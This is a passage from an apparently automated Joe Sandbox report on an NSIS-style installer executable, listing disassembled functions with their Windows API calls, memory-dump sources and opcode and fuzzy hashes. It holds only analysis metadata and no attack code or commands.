                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 00405761
                                                  • CloseHandle.KERNEL32(?), ref: 0040576E
                                                  Strings
                                                  • Error launching installer, xrefs: 0040574B
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                                                  • Instruction ID: 69b2a91025ee82e0f17d0b644fa8ba69f8cb79a6280e59e5c1840fb2568b3eab
                                                  • Opcode Fuzzy Hash: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                                                  • Instruction Fuzzy Hash: 00E046F0600209BFEB009F60EE49F7BBBACEB10704F808421BD00F2190D6B898448A78
                                                  Function 00406B5A Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: da96dc2bbb9a86ab2b5a0042be55c5a39520afa60a4d641acd723a491c183434
                                                  • Instruction ID: 6855221002494b765214394805571b816b3a2b1c2e31bdc36608bad3b484bcdf
                                                  • Opcode Fuzzy Hash: da96dc2bbb9a86ab2b5a0042be55c5a39520afa60a4d641acd723a491c183434
                                                  • Instruction Fuzzy Hash: FEA13271E00229CBDF28CFA8C8446ADBBB1FF44305F15856EE816BB281C7795A96DF44
                                                  Function 00406D5B Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 45b087146125c5b2b0c74364d17b57d2d8ebf1295e4abb7c2da9f37e6e20948f
                                                  • Instruction ID: 6c4a77322bd37e7d8c46b95768b691bf5348243e95b36c4706824fec2f4d082d
                                                  • Opcode Fuzzy Hash: 45b087146125c5b2b0c74364d17b57d2d8ebf1295e4abb7c2da9f37e6e20948f
                                                  • Instruction Fuzzy Hash: A0911170D00229CBDF28CF98C8587ADBBB1FF44305F15856AE816BB281C7795A96DF84
                                                  Function 00406A71 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec7db08be09974c8046cad88b73edbb403e33193446cf3f9fa5a5555e34d97c1
                                                  • Instruction ID: 723f18ff0051ee6ad4f375e9cb18d989a687bb59657bcd06a5bbc8819a965d11
                                                  • Opcode Fuzzy Hash: ec7db08be09974c8046cad88b73edbb403e33193446cf3f9fa5a5555e34d97c1
                                                  • Instruction Fuzzy Hash: F5814371E00229CFDF24CFA8C8847ADBBB1FB44305F25856AD416BB281C7389A96DF44
                                                  Function 00406576 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8c6c0676c47b070245886c612b6dc18845a4ce32cc894a17ea31aa6889f3f80a
                                                  • Instruction ID: f9a0fdfb68df0875c036107095c0f8e37124572de3281b7b6a4fcb1f7c3ff658
                                                  • Opcode Fuzzy Hash: 8c6c0676c47b070245886c612b6dc18845a4ce32cc894a17ea31aa6889f3f80a
                                                  • Instruction Fuzzy Hash: DF818771D00229DBDF24CFA8D8447AEBBB0FF44305F11856AE856BB280CB785A96DF44
                                                  Function 004069C4 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6ce5af891e87e3449ce1a2b8efcbaa2a3983e7e126d00aa5b1ca20c5284b7a8
                                                  • Instruction ID: 20aa67b2f9945943e29b5428d9247f38e2249d0fc5fe98f3e4ff2a84f3334865
                                                  • Opcode Fuzzy Hash: f6ce5af891e87e3449ce1a2b8efcbaa2a3983e7e126d00aa5b1ca20c5284b7a8
                                                  • Instruction Fuzzy Hash: 17712271E00229DBDF24CFA8C8447ADBBB1FF44305F15846AE856BB280C7395996DF54
                                                  Function 00406AE2 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cda32c1d2df7732f9a33e0b4945691d5d8bf2b32cd6aa3e273add15dd404c12
                                                  • Instruction ID: 361238ff60de6b05a878e60f6b30513898442098bea6392746699c597b8ff52c
                                                  • Opcode Fuzzy Hash: 8cda32c1d2df7732f9a33e0b4945691d5d8bf2b32cd6aa3e273add15dd404c12
                                                  • Instruction Fuzzy Hash: 53713371E00229DBDF28CF98C844BADBBB1FF44305F15846AE816BB280CB795996DF54
                                                  Function 00406A2E Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ce01b185a18f77deed043a820b6804b7b2a700fb218066bf9b3b7a05f4b9fc8
                                                  • Instruction ID: cefc1bbef9c73defef891fc114d0afe65c0266ceafdcaf147cd695a7a928f12c
                                                  • Opcode Fuzzy Hash: 7ce01b185a18f77deed043a820b6804b7b2a700fb218066bf9b3b7a05f4b9fc8
                                                  • Instruction Fuzzy Hash: E1715671E00229DBDF28CF98C8447ADBBB1FF44305F15846AD816BB281CB795996DF44
                                                  Function 00403146 Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040315A
                                                    • Part of subcall function 004032C5: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FC3,?), ref: 004032D3
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403070,00000004,00000000,00000000,?,?,00402FEA,000000FF,00000000,00000000,0040A130,?), ref: 0040318D
                                                  • SetFilePointer.KERNELBASE(000749E8,00000000,00000000,004138D8,00004000,?,00000000,00403070,00000004,00000000,00000000,?,?,00402FEA,000000FF,00000000), ref: 00403288
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: FilePointer$CountTick
                                                  • String ID:
                                                  • API String ID: 1092082344-0
                                                  • Opcode ID: 66296152afd6068201e6c2e1ab460adb435358711bd3d40a2675aec94dc3ea3b
                                                  • Instruction ID: 532adb213c64d5ab3b143d976f528210e7f95c922d5c949e36f01b9cb200fd6d
                                                  • Opcode Fuzzy Hash: 66296152afd6068201e6c2e1ab460adb435358711bd3d40a2675aec94dc3ea3b
                                                  • Instruction Fuzzy Hash: FD3160726442049FD710AF6AFE4896A3BECF75435A710827FE904B22F0DB389941DB9D
                                                  Function 00402245 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040639C: FindFirstFileA.KERNELBASE(77273410,00422580,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00405B62,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,77273410,?,77272EE0,00405881,?,77273410,77272EE0), ref: 004063A7
                                                    • Part of subcall function 0040639C: FindClose.KERNELBASE(00000000), ref: 004063B3
                                                  • lstrlenA.KERNEL32 ref: 00402285
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040228F
                                                  • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004022B7
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: FileFindlstrlen$CloseFirstOperation
                                                  • String ID:
                                                  • API String ID: 1486964399-0
                                                  • Opcode ID: 8a5359ab55cf707fdaf4c1bec01a7dc3010dae1b0a70d350ad33f0d8d509da0f
                                                  • Instruction ID: 7601fe6c075200cb0f0395ff2ba46aeb4d837e4f3c96b4285f6c21aa21cd7a5f
                                                  • Opcode Fuzzy Hash: 8a5359ab55cf707fdaf4c1bec01a7dc3010dae1b0a70d350ad33f0d8d509da0f
                                                  • Instruction Fuzzy Hash: F8117C71A14205AACB10EFF98949A9DBAF8AF44304F10403FA405FB2C2D6B8C5418B69
                                                  Function 004024DF Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402511
                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402524
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,00000011,00000002), ref: 0040253C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: Enum$CloseValue
                                                  • String ID:
                                                  • API String ID: 397863658-0
                                                  • Opcode ID: 547aa21c4714850b9d30cdb1e69eaa8fead0b96bf9a6bfc192b103fbdf10e22d
                                                  • Instruction ID: 518a01c90e212b4e6c6a91e55dc37795372a660c14e02f5234546a481bba951e
                                                  • Opcode Fuzzy Hash: 547aa21c4714850b9d30cdb1e69eaa8fead0b96bf9a6bfc192b103fbdf10e22d
                                                  • Instruction Fuzzy Hash: 9901B171A04105AFE7159F69DE9CABF7ABCEF80348F10003EF405A61C0DAB84A419729
                                                  Function 0040303E Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00402FEA,000000FF,00000000,00000000,0040A130,?), ref: 00403063
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 636c82f294539f8116134b886240b7bf4a9a68a3f80346334f9d5df26d1cb633
                                                  • Instruction ID: d45136b7277fa4a4eeb989eab338d16e1e03b20585a5145be81ea7fda6220a17
                                                  • Opcode Fuzzy Hash: 636c82f294539f8116134b886240b7bf4a9a68a3f80346334f9d5df26d1cb633
                                                  • Instruction Fuzzy Hash: 6C314F31204259EFDB109F56DD44A9A7FA8EB08759F10803AF905FA190D378DA50DBA9
                                                  Function 0040246D Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040249D
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa17F6.tmp,00000000,00000011,00000002), ref: 0040253C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  • Opcode ID: 85e0e86c2224e170e7430ff9fe47b25ca0d4adbee95ba4f9787d494f05a4965f
                                                  • Instruction ID: 1b22629e75d9b419b9fa7e371b5212fc4da00fb077cffe61c988f7dc4f8aba71
                                                  • Opcode Fuzzy Hash: 85e0e86c2224e170e7430ff9fe47b25ca0d4adbee95ba4f9787d494f05a4965f
                                                  • Instruction Fuzzy Hash: 5511E771A05205EEDB15DF64DA8C5BE7BB4EF05348F20403FE446B72C0D6B88A42DB29
                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.215955677144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.215955643803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955715289.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215955792737.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000004.00000002.215956004977.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_400000_Uundgaaelige.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 9ad871f4f8a3338eb99fe4e61ab0dcd0b50e8b4f7c7093f405d94b725c985010
                                                  • Instruction ID: 0b9a08df0e19283e0c47f542131d218e25c17bbe1cc26e2bbd3e30b70dde81e4
                                                  • Opcode Fuzzy Hash: 9ad871f4f8a3338eb99fe4e61ab0dcd0b50e8b4f7c7093f405d94b725c985010
                                                  • Instruction Fuzzy Hash: FD01F431B202109BE7194B389D05B6A36A8E710315F51823FF951F65F1D778CC038B4C
                                                  Function 0040237B Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
